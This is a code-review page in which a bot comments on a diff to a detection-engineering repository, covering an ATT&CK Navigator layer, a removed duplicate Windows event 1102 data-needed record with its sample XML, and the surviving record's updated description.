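Review bot: same concern as Test #1: "AtomicUser" is a literal where the account name is presumably an input, so refer to the input name or mark the value as the default. Also worth noting that `net user` without `/domain` lists local accounts only, which matches the local `net user ... /add` in the header context but should be said if the test is ever pointed at a domain account.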

File diff suppressed because one or more lines are too long

View File

@ -1 +1 @@
{"version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": 
true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true, "name": "TESTCUSTOMER"}
{"version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": 
true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true, "name": "TESTCUSTOMER"}
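Review bot: the layer still carries duplicate entries after this change: `T1191`/defense-evasion, `T1191`/execution, `T0069`/defense-evasion, `T0069`/execution, `T1055`/defense-evasion and `T1055`/privilege-escalation each appear twice in the `techniques` array, so dropping `T1086` and `T1158` fixes only part of the inconsistency; a dedupe on (techniqueID, tactic) before export would settle it. The single-line JSON also hides the real change in review (the only way to see it is to diff the two lines by hand); pretty-printing the layer file would make future changes reviewable.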

View File

@ -1,50 +0,0 @@
title: DN_0038_1102_the_audit_log_was_cleared
description: >
Event 1102 is logged whenever the Security log is cleared,
REGARDLESS of the status of the Audit System Events audit policy
loggingpolicy:
- none
references:
- https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102#security-monitoring-recommendations
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102
category: OS Logs
platform: Windows
type: Windows Log
channel: Security
provider: Microsoft-Windows-Eventlog
fields:
- EventID
- Hostname # redundant
- Computer
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
sample: |
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Eventlog" Guid="{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" />
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-16T00:39:58.656871200Z" />
<EventRecordID>1087729</EventRecordID>
<Correlation />
<Execution ProcessID="820" ThreadID="2644" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <UserData>
- <LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
<SubjectUserSid>S-1-5-21-3457937927-2839227994-823803824-1104</SubjectUserSid>
<SubjectUserName>dadmin</SubjectUserName>
<SubjectDomainName>CONTOSO</SubjectDomainName>
<SubjectLogonId>0x55cd1d</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>
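Review bot: removing DN_0038 in favour of the DN_0050 entry is the right fix for a duplicated 1102 data-needed record, but this is the file that carried the `provider: Microsoft-Windows-Eventlog` line, the `fields` list and the XML `sample`; the DN_0050 hunk below shows only its header fields, so confirm those sections exist there (or port them) before any rule that referenced DN_0038 loses its field reference. Worth grepping the repository for remaining `DN_0038` references as part of this commit.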

View File

@ -1,10 +1,12 @@
title: DN_0050_1102_audit_log_was_cleared
description: >
This event generates every time Windows Security audit log was cleared
Event 1102 is created whenever the Security log is cleared,
REGARDLESS of the status of the Audit System Events audit policy
loggingpolicy:
- None
references:
- https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102
category: OS Logs
platform: Windows
type: Windows Log
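Review bot: `loggingpolicy` is `- None` here but `- none` in the deleted DN_0038 above; pick one casing so consumers that compare the value literally behave consistently across entries. The new description is correct, and the reason is visible in the deleted sample (`<Provider Name="Microsoft-Windows-Eventlog" .../>`): 1102 is written by the Eventlog provider rather than by Security-Auditing, which is why the Audit System Events policy does not gate it; one clause saying so would save the next reader a lookup.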

@ -1 +1 @@
Subproject commit 5ea623506f95832177c245c8c072d1c71d06c192
Subproject commit 693830fa838da070e125342bf108efc8cf8f9d42

@ -1 +1 @@
Subproject commit f54b8ec6cb83b7214b9560115df004c404ccbc6c
Subproject commit 155fbfa6df7b8b10b92f22a2fec083e4db373402

@ -1 +1 @@
Subproject commit 9476a6348d4ce62931993af6b953688666ca2453
Subproject commit d58d614940e9ac224677c6d49625e5274c0047be